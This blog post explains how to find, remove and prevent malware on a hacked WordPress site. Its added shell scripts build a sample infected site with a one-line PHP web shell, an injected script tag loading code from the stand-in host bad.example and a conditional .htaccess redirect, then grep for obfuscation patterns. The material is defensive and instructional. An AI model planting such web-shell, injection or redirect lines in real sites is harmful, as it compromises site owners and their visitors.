This week was pretty busy. One of the non-profits I know found itself in quite a predicament: its WordPress site was infected with malware. The site was hacked, and scripts were executed in visitors' browsers that did two different things:
- The site tried to infect Microsoft Windows users with malware.
I discovered the WordPress site was hacked when I visited it after clicking through from their latest newsletter, and I immediately notified them of what was going on. Unfortunately, it was quite an aggressive attack: I was able to remove it, but the site was reinfected as soon as it went live again. This is a pretty common practice by malware hackers – they not only hack the site, they also either add an administrative user or alter a core WordPress file that re-injects the hack if it's removed.
What is Malware?
Malware is an ongoing issue on the web. It is used to inflate click-through rates on ads (ad fraud), inflate site statistics to overcharge advertisers, try to get at visitors' financial and personal data, and, most recently, to mine cryptocurrency. Miners are paid in cryptocurrency for the computation they perform, but the hardware and electricity that computation needs are expensive. By secretly harnessing visitors' computers through a script on a hacked site, the attacker gets the payout without the expense.
WordPress and other popular platforms are huge targets for hackers since they are the foundation of so many websites. Themes and plugins run as the same PHP code as WordPress core, with the same access to the filesystem and the database, so a security hole in any one of them exposes the whole site. The WordPress community is outstanding at identifying and patching security holes – but site owners are not nearly as vigilant about keeping their sites, themes and plugins updated to the patched versions.
This site was hosted on GoDaddy's traditional web hosting (not GoDaddy's Managed WordPress hosting), which offers no protection of its own. Of course, they do sell a malware scanner and removal service. Managed WordPress hosting companies such as Flywheel, WP Engine, LiquidWeb, GoDaddy, and Pantheon all provide automated updates to keep your sites current when issues are identified and patched. Most have malware scanning and a blacklist of known-vulnerable themes and plugins to help site owners prevent a hack. Some companies go a step further – Kinsta, a high-performance Managed WordPress host, even offers a security guarantee.
Additionally, the team at Jetpack offers a great service for automatically checking your site for malware and other vulnerabilities daily. This is an ideal solution if you’re self-hosting WordPress on your infrastructure.
You can also utilize third-party malware scanning incorporated into plugins like All-In-One WP Security and Firewall, which will report if your site is blacklisted on active malware monitoring services.
Is Your Site Blacklisted for Malware?
Many sites online promote checking your site for malware, but keep in mind that most of them are not checking your site at all in real time. A real-time check requires a third-party crawler to fetch and analyze your pages, which takes time. The sites that return an instantaneous verdict are reporting from a blacklist built from earlier crawls, i.e., they previously found malware on your site. Some of the malware-checking sites on the web are:
- Google Transparency Report – if your site is registered with Google Search Console (formerly Webmaster Tools), Google will alert you when its crawler finds malware on it.
- Norton Safe Web – Norton also operates web browser plugins and desktop security software that will block users from even opening your page if they've blacklisted it. Website owners can register on the site and request their site be re-evaluated once it's clean.
- Sucuri – Sucuri maintains a list of malware sites along with a report on where they’ve been blacklisted. If your site is cleaned up, you’ll see a Force a Re-Scan link under the listing (in very small print). Sucuri has an outstanding plugin that detects issues… and then pushes you into an annual contract to remove them.
- Yandex – if you search Yandex for your domain and see “According to Yandex, this site might be dangerous”, you can register for Yandex webmasters, add your site, navigate to Security and Violations, and request your site be cleared.
- Phishtank – Some hackers will put phishing scripts on your site to get your domain listed as a phishing domain. If you enter the exact, full URL of the reported malware page in Phishtank, you can register with Phishtank and vote whether or not it’s truly a phishing site.
Unless your site is registered and you have a monitoring account somewhere, you will probably first hear about it from a visitor whose browser or security software blocked the page. Don't ignore the alert… while you may not see a problem, false positives rarely happen. These issues can get your site de-indexed from search engines and blocked by browsers. Worse, your potential clients and existing customers may wonder what kind of organization they're working with.
How do You Check for Malware?
Several of the companies above talk about how difficult it is to find malware, but it's not quite so difficult. The difficulty is figuring out how it got into your site! Here is how to locate the malicious code:
- Maintenance – Before anything, point the site at a static maintenance page and back it up. Don't use WordPress' default maintenance mode or a maintenance plugin, as those still execute WordPress on the server. You want to ensure no one can execute any PHP file on the site while you work, since a request to an infected file is often what re-injects the hack. While at it, check the .htaccess file on the web server to ensure it doesn't have rogue rewrite rules redirecting traffic (often only for certain user agents or referrers, so the owner never sees it).
- Search your site's files via SFTP or FTP and identify the most recently changed files in plugins, themes, or core WordPress files. Open those files and look for edits that add script tags or calls such as eval(base64_decode(...)), which are used to hide what a server-side script actually does.
- Compare the core WordPress files in your root directory, wp-admin directory, and wp-includes directory against a fresh download of the same version to see if any new files or files of a different size exist. Check every file that differs. Even if you find and remove a hack, keep looking, since many hackers leave backdoors to re-infect the site. Don't simply overwrite or re-install WordPress and call it done… hackers often add a malicious script in the root directory and call it some other way to re-inject the hack. The less complex malware typically just inserts a script tag into header.php or footer.php. More complex malware will actually modify every PHP file on the server with re-injection code so that you have a difficult time removing it.
- Remove third-party advertising scripts that may be the source. I’ve refused to apply new ad networks when I’ve read that they’ve been hacked online.
- Check your posts table in the database for scripts embedded in page content. You can do this with simple searches in phpMyAdmin, searching post_content for the malicious URL or for script tags.
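The mechanical checks in the list above, as an added example that is not part of the original post and not the author's own tooling: a POSIX shell script that builds a small constructed sample site (a "clean" copy and a "live" copy, a made-up bad.example host, 2018 timestamps) and runs the four file-level checks over it. Point the functions at a real site and at a pristine WordPress download of the same version to use them for real.

```sh
#!/bin/sh
# Added example, not from the original post: the four file-level checks from
# the list above as shell functions, run over a constructed sample tree so the
# script works offline. File names, the bad.example host and the timestamps are
# made up; on a real site pass the web root and a pristine download instead.

# Constructed sample: "clean" is a pristine copy, "live" is the hacked site
# with an altered core file, a dropped web shell, an injected theme header and
# a conditional redirect in .htaccess. One core file is left untouched.
make_sample_site() {
  root="$1"
  mkdir -p "$root/clean/wp-includes" "$root/live/wp-includes" \
           "$root/live/wp-content/themes/twentyseventeen"
  printf '<?php\nfunction wp_get_version() { return "5.0"; }\n' > "$root/clean/wp-includes/version.php"
  printf '<?php\nfunction wp_helper() { return 1; }\n' > "$root/clean/wp-includes/functions.php"
  cp "$root/clean/wp-includes/"*.php "$root/live/wp-includes/"
  # Core file altered in place: a re-injection hook appended to the end.
  printf 'eval(base64_decode("ZWNobyAiaGkiOw=="));\n' >> "$root/live/wp-includes/version.php"
  # Theme header with an injected script tag.
  printf '<html><head><script src="http://bad.example/x.js"></script>\n' \
    > "$root/live/wp-content/themes/twentyseventeen/header.php"
  # Dropped web shell in the web root, named to look like a core file.
  printf '<?php\n@eval(gzinflate(base64_decode($_POST["c"])));\n' > "$root/live/wp-load2.php"
  # Conditional redirect: only Windows user agents are sent to the malware
  # host, so the owner (on a Mac, or a crawler) never sees it.
  printf 'RewriteEngine On\nRewriteCond %%{HTTP_USER_AGENT} Windows [NC]\nRewriteRule ^ http://bad.example/ [R=302,L]\n' \
    > "$root/live/.htaccess"
  # Age every file, then re-touch only the ones the "attacker" wrote.
  find "$root" -type f -exec touch -t 201801010000 {} +
  touch "$root/live/wp-includes/version.php" "$root/live/wp-load2.php" \
        "$root/live/wp-content/themes/twentyseventeen/header.php" "$root/live/.htaccess"
}

# Check 1: files changed in the last N days. Injected files tend to share a
# timestamp, which points you at the moment of compromise.
recent_files() { find "$1" -type f -mtime "-$2" | sort; }

# Check 2: obfuscation and web-shell idioms. Legitimate themes and plugins
# almost never eval decoded strings or execute whatever arrives in $_POST.
# Expect a few false positives (some caching plugins use gzinflate); read
# each hit rather than deleting on sight.
suspicious_php() {
  grep -rlE --include='*.php' \
    'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|\$_(POST|GET|REQUEST)\[' "$1" | sort
}

# Check 3: core files that differ from a pristine copy (modified, added or
# removed). wp-content is excluded because it differs on every site; note that
# wp-config.php shows up as "Only in live" and has to be read by hand.
core_diff() { diff -rq -x wp-content "$1" "$2" | sort; }

# Check 4: .htaccess redirects. A RewriteRule to an absolute URL, especially
# one guarded by a user-agent or referrer condition, is the classic hidden
# redirect.
htaccess_redirects() {
  grep -nE 'RewriteRule .*https?://|RewriteCond .*(HTTP_USER_AGENT|HTTP_REFERER)' \
    "$1/.htaccess" 2>/dev/null
}

SAMPLE="$(mktemp -d)"
make_sample_site "$SAMPLE"
echo "== changed in the last 2 days";   recent_files "$SAMPLE/live" 2
echo "== obfuscated / shell-like PHP";  suspicious_php "$SAMPLE/live"
echo "== core differs from clean copy"; core_diff "$SAMPLE/clean" "$SAMPLE/live"
echo "== .htaccess redirects";          htaccess_redirects "$SAMPLE/live"
```

On a host where WP-CLI is installed, `wp core verify-checksums` does check 3 against the checksums WordPress.org publishes for your exact version. The database check from the last list item has no file equivalent; in phpMyAdmin it is a query of the form `SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%'`, repeated for the malicious hostname once you know it.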
How Do You Remove The Malware?
A good friend of mine recently got his WordPress blog hacked. It was quite a malicious attack that could impact his search ranking and, of course, his momentum in traffic. Here’s my advice for what to do if WordPress gets hacked:
- Stay Calm! Don’t start deleting things and installing all kinds of crap that promise to clean your installation up. You don’t know who wrote it and whether or not it’s simply adding more malicious crap to your blog. Take a deep breath, look at this blog post, and slowly and deliberately go down the checklist.
- Take down the blog. Immediately. Putting up an index.html page is not enough, and neither is renaming index.php: requests to wp-login.php, xmlrpc.php or any PHP file the attacker dropped will still execute. You need to halt all traffic to every page of your blog, which means blocking PHP execution at the web server (as in the maintenance step above) and serving a static text page that says you're offline for maintenance and will be back soon. The reason you need to take down the blog is that most of these hacks aren't done by hand; they're done through malicious scripts that attach themselves to every writeable file in your installation. A single request that executes an infected file can reinfect the files you're working to repair.
- Back up your site. Don’t just back up your files, also back up your database. Store it somewhere special if you need to refer to some of the files or information.
- Remove all themes. Themes are an easy means for a hacker to script and insert code into your blog. Many themes are also written by designers who don't understand the nuances of securing your pages, your code, or your database.
- Remove all plugins. Plugins are the easiest means for a hacker to script and insert code into your blog. Many plugins are written by developers who don't understand the nuances of securing your pages, your code, or your database. Once a vulnerable plugin file is known, attackers simply run crawlers that search the web for other sites running that same file.
- Reinstall WordPress. When I say reinstall WordPress, I mean it – including your theme. Don't forget wp-config.php, a file that's not overwritten when you copy over WordPress. In this blog, I found the malicious script was base64-encoded so it just looked like a blob of text, and it was inserted in the header of every single page, including wp-config.php.
- Review your database. You'll want to review your options table and your posts table especially, looking for any strange external references or content. If you've never looked at your database before, be prepared to find phpMyAdmin or another database query tool within your host's management panel. It's not fun – but it's a must.
- Start up WordPress with a default theme and no plugins installed. If your content appears and you don't see any automated redirects to malicious sites, you're probably okay. If you do get redirected to a malicious site, clear your browser and any server-side cache first to ensure you're looking at the latest copy of the page. You may need to go through your database record by record to locate whatever content is paving the way into your blog. Chances are your database is clean… but you never know!
- Install Your Theme. If the malicious code replicated, you’re probably going to have an infected theme. You may need to go line by line through your theme to ensure there’s no malicious code. You may be better off just starting out fresh. Open the blog up to a post and see if you’re still infected.
- Install your plugins. You may want to use a plugin such as Clean Options first, to remove leftover options from plugins you're no longer using or wanting. Don't go crazy though; this plugin is not the best… it often displays and allows you to delete settings you want to hang on to. Download all your plugins fresh from the WordPress.org plugin directory. Run your blog again!
If you see the issue come back, chances are that you’ve reinstalled a plugin or theme that’s vulnerable OR there was something hidden in the content of your site stored in the database. If the issue never leaves, you’ve probably tried to take a couple shortcuts in troubleshooting these issues. Don’t take a shortcut.
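The take-down and backup steps from the list above, as an added example that is not the author's own procedure and not code from the original post. It assumes Apache with mod_rewrite and the 2.4 `Require` syntax (on 2.2, `Deny from all` does the same job); the web root it runs on at the bottom is constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Takes a WordPress site offline so
# that no PHP executes at all, keeps the attacker's .htaccess as evidence, and
# snapshots the files. Assumes Apache with mod_rewrite (2.4 "Require" syntax;
# on 2.2 use "Deny from all"). The demo tree at the bottom is constructed.

# Replace .htaccess with rules that answer every request with a 503 and a
# static page. The page itself is exempted from the rewrite so the
# ErrorDocument subrequest can serve it; the FilesMatch block is belt and
# braces in case a request ever reaches a .php file. Apache's default config
# already refuses to serve .ht* files, so the evidence copy is not exposed.
write_maintenance_htaccess() {
  root="$1"
  if [ -f "$root/.htaccess" ]; then mv "$root/.htaccess" "$root/.htaccess.infected"; fi
  printf '<!doctype html>\n<title>Maintenance</title>\n<p>Offline for maintenance. Back soon.</p>\n' \
    > "$root/maintenance.html"
  cat > "$root/.htaccess" <<'EOF'
ErrorDocument 503 /maintenance.html
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/maintenance\.html$
RewriteRule ^ - [R=503,L]
<FilesMatch "\.php$">
    Require all denied
</FilesMatch>
EOF
}

# Snapshot the whole tree, .htaccess.infected included, into an archive kept
# outside the web root. The database is dumped separately, e.g.
#   mysqldump -u DBUSER -p DBNAME > db-before-cleanup.sql
backup_site() {
  root="$1"; out="$2"
  tar -czf "$out" -C "$root" .
}

# When you go live again, do not put the old .htaccess back: write the stock
# WordPress rules and nothing else.
write_default_htaccess() {
  cat > "$1/.htaccess" <<'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
}

# Constructed demo: a web root holding an index.php and a redirecting .htaccess.
DEMO="$(mktemp -d)"
printf '<?php echo "site";\n' > "$DEMO/index.php"
printf 'RewriteEngine On\nRewriteRule ^ http://bad.example/ [R=302,L]\n' > "$DEMO/.htaccess"
write_maintenance_htaccess "$DEMO"
backup_site "$DEMO" "$DEMO.tar.gz"
echo "== maintenance .htaccess"; cat "$DEMO/.htaccess"
echo "== archive contents";      tar -tzf "$DEMO.tar.gz"
```

The 503 status matters: search engines treat it as temporary and keep your pages indexed, whereas a 200 maintenance page served for every URL can get them dropped. Keep the archive and the .htaccess.infected copy for the diff described in the hardening section.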
These hackers are nasty folks! Not understanding every plugin and theme file puts us all at risk, so be vigilant. Install plugins that have great ratings, plenty of active installations, and a record of recent updates. Read the reviews and support threads folks have left on them.
How do You Prevent Your Site from Being Hacked and Malware Installed?
Before you put your site live… it’s now time to harden your site to prevent an immediate re-injection or another hack:
- Verify every user on the website. Hackers often inject scripts that add an administrative user, and some hide that user from the Users screen, so check the wp_users and wp_usermeta tables directly as well. Remove any old or unused accounts and reassign their content to an existing user. If you have a user named admin, add a new administrator with a unique login and remove the admin account altogether.
- Reset every user's password. Many sites are hacked because a user chose a simple password that was guessed in an attack, letting someone log into WordPress and do whatever they'd like. Also regenerate the authentication keys and salts in wp-config.php, which invalidates every existing login cookie, including the attacker's.
- Disable the ability to edit plugins and themes via WordPress Admin by setting the DISALLOW_FILE_EDIT constant in wp-config.php. The built-in editor lets anyone who gets into the dashboard write PHP to your server. Make the core WordPress files unwriteable by the web server's PHP process so that injected scripts can't rewrite core code. All In One WP Security and Firewall (mentioned above) provides this kind of WordPress hardening with a ton of features.
- Manually download and reinstall the latest versions of every plugin you require and remove any other plugins. Absolutely remove administrative plugins that give direct access to site files or the database, these are especially dangerous.
- Replace every file in your root directory, wp-includes and wp-admin (everything except the wp-content folder) with a fresh installation of WordPress downloaded directly from wordpress.org. Recreate wp-config.php from the fresh wp-config-sample.php rather than keeping the old one, since it is a favorite place to hide re-injection code.
- Diff – You may also wish to run a diff between a backup of your site from before the malware and the current site… this will show you which files were edited and exactly what changed. diff is a standard command-line tool that compares directories and files and reports the differences between the two. With the number of updates made to WordPress sites, this isn't always the easiest method – but sometimes the malware code really stands out.
- Maintain your site! The site I worked on this weekend had an old version of WordPress with known security holes, old users that shouldn’t have access anymore, old themes, and old plugins. It could have been any one of these that opened the company up for getting hacked. If you can’t afford to maintain your site, be sure to move it to a managed hosting company that will! Spending a few more bucks on hosting could have saved this company from this embarrassment.
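The hardening steps above that can be scripted, as an added example that is not part of the original post and not the author's own procedure: a POSIX shell script that idempotently adds the DISALLOW_FILE_EDIT (and, optionally, DISALLOW_FILE_MODS) constants to wp-config.php and sets sane file modes. The wp-config.php it runs on is a constructed sample.

```sh
#!/bin/sh
# Added example, not from the original post. Hardening steps from the list
# above that can be scripted: add the wp-config.php constants that switch off
# the in-dashboard theme/plugin editor (and, optionally, dashboard installs
# and updates), and set sane file modes. The sample wp-config.php is
# constructed for the demonstration.

# Idempotently add   define('NAME', VALUE);   to wp-config.php, just ahead of
# the "That's all, stop editing!" marker so it is set before wp-settings.php
# loads. Running it twice for the same NAME changes nothing.
ensure_define() {
  cfg="$1"; name="$2"; value="$3"
  if grep -qE "define\([[:space:]]*['\"]$name['\"]" "$cfg"; then
    return 0
  fi
  line="define('$name', $value);"
  if grep -q "stop editing" "$cfg"; then
    # awk rather than sed -i: the latter differs between GNU and BSD
    awk -v l="$line" '/stop editing/ { print l } { print }' "$cfg" > "$cfg.tmp" \
      && mv "$cfg.tmp" "$cfg"
  else
    printf '%s\n' "$line" >> "$cfg"
  fi
}

# Directories 755, files 644, wp-config.php 640. What actually stops injected
# PHP from rewriting core is ownership, not the mode: the files should belong
# to a deploy user, with the PHP worker (www-data, apache, nobody) able to
# write only under wp-content/uploads. chmod 444 on core is not the answer;
# it breaks updates, and a PHP process that owns the files can chmod them
# back anyway.
harden_permissions() {
  root="$1"
  find "$root" -type d -exec chmod 755 {} +
  find "$root" -type f -exec chmod 644 {} +
  chmod 640 "$root/wp-config.php"
}

# Symbolic mode of a path, e.g. -rw-r-----, for the report and the checks.
file_mode() { ls -ld "$1" | cut -c1-10; }

# Constructed sample: a minimal wp-config.php and one core file.
SAMPLE="$(mktemp -d)"
mkdir -p "$SAMPLE/wp-includes"
printf '<?php\n' > "$SAMPLE/wp-includes/version.php"
cat > "$SAMPLE/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wp');
define('DB_PASSWORD', 'changeme');
/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
EOF
ensure_define "$SAMPLE/wp-config.php" DISALLOW_FILE_EDIT true   # no PHP editor in the dashboard
# DISALLOW_FILE_MODS also blocks dashboard installs, updates and automatic
# updates, so only set it if you update via SFTP or WP-CLI instead.
ensure_define "$SAMPLE/wp-config.php" DISALLOW_FILE_MODS true
ensure_define "$SAMPLE/wp-config.php" DISALLOW_FILE_EDIT true   # second run: no duplicate line
harden_permissions "$SAMPLE"
echo "== wp-config.php"; cat "$SAMPLE/wp-config.php"
echo "== modes"; file_mode "$SAMPLE/wp-config.php"; file_mode "$SAMPLE/wp-includes/version.php"
```

The user and password steps are quicker from WP-CLI where it is available: `wp user list --role=administrator` shows every administrator the database knows about, whether or not the dashboard shows them, and `wp user update <id> --user_pass=NEWPASSWORD` (NEWPASSWORD being your own value) resets one. Fresh keys and salts for wp-config.php come from https://api.wordpress.org/secret-key/1.1/salt/.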
Once you believe you've got everything fixed and hardened, you can bring the site back live by removing the maintenance rules from .htaccess (write a fresh one; don't restore the old file). As soon as it's live, look for the same infection that was previously there. I typically use the browser's developer tools to monitor the network requests the page makes. I track down every request to ensure it isn't malware or otherwise mysterious… if it is, it's back to the top and through the steps all over again.
Remember – once your site is clean, it will not automatically be removed from blacklists. You should contact each and make the request per our list above.
Getting hacked like this is not fun. Companies charge several hundred dollars to remove these threats. I worked no less than 8 hours to help this company clean up their site.